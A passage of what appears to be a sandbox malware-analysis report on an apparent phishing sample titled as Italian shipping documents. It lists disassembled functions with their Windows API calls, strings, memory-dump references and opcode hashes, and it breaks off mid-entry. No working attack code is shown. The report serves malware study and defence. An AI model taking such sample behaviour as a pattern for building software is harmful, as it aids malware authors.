                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend$Window
                        • String ID: SysMonthCal32
                        • API String ID: 2326795674-1439706946
                        • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                        • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                        • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                        • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                        Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(00000000), ref: 00450A2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: DestroyWindow
                        • String ID: msctls_updown32
                        • API String ID: 3375834691-2298589950
                        • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                        • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                        • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                        • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                        Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: $<
                        • API String ID: 4104443479-428540627
                        • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                        • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                        • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                        • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                        Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorMode$DiskFreeSpace
                        • String ID: \VH
                        • API String ID: 1682464887-234962358
                        • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                        • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                        • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                        • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                        Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorMode$DiskFreeSpace
                        • String ID: \VH
                        • API String ID: 1682464887-234962358
                        • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                        • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                        • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                        • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                        Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorMode$DiskFreeSpace
                        • String ID: \VH
                        • API String ID: 1682464887-234962358
                        • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                        • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                        • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                        • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                        Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorMode$InformationVolume
                        • String ID: \VH
                        • API String ID: 2507767853-234962358
                        • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                        • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                        • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                        • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                        Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorMode$InformationVolume
                        • String ID: \VH
                        • API String ID: 2507767853-234962358
                        • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                        • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                        • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                        • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                        Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                        • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: msctls_trackbar32
                        • API String ID: 3850602802-1010561917
                        • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                        • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                        • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                        • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                        Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                        • String ID: crts
                        • API String ID: 943502515-3724388283
                        • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                        • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                        • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                        • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                        Function 0046E48C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                        • CoInitialize.OLE32(00000000), ref: 0046E505
                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                        • CoUninitialize.OLE32 ref: 0046E53D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                        • String ID: .lnk
                        • API String ID: 886957087-24824748
                        • Opcode ID: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                        • Instruction ID: 8523b4f55483354ee3aaa8e7e2ee5f8b04597d59409be9d2747526508be4cfd1
                        • Opcode Fuzzy Hash: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                        • Instruction Fuzzy Hash: E72183312082009FD700EF55C985F4AB7F4AF88729F14866EF9589B2E1D7B4E804CB56
                        Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                        • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                        • SetErrorMode.KERNEL32(?), ref: 0045D35C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorMode$LabelVolume
                        • String ID: \VH
                        • API String ID: 2006950084-234962358
                        • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                        • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                        • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                        • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                        Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • GetMenuItemInfoW.USER32 ref: 00449727
                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                        • DrawMenuBar.USER32 ref: 00449761
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Menu$InfoItem$Draw_malloc
                        • String ID: 0
                        • API String ID: 772068139-4108050209
                        • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                        • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                        • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                        • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                        Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _wcslen$_wcscpy
                        • String ID: 3, 3, 8, 1
                        • API String ID: 3469035223-357260408
                        • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                        • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                        • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                        • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                        Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                        • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: ICMP.DLL$IcmpCloseHandle
                        • API String ID: 2574300362-3530519716
                        • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                        • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                        • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                        • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                        Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                        • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: ICMP.DLL$IcmpCreateFile
                        • API String ID: 2574300362-275556492
                        • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                        • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
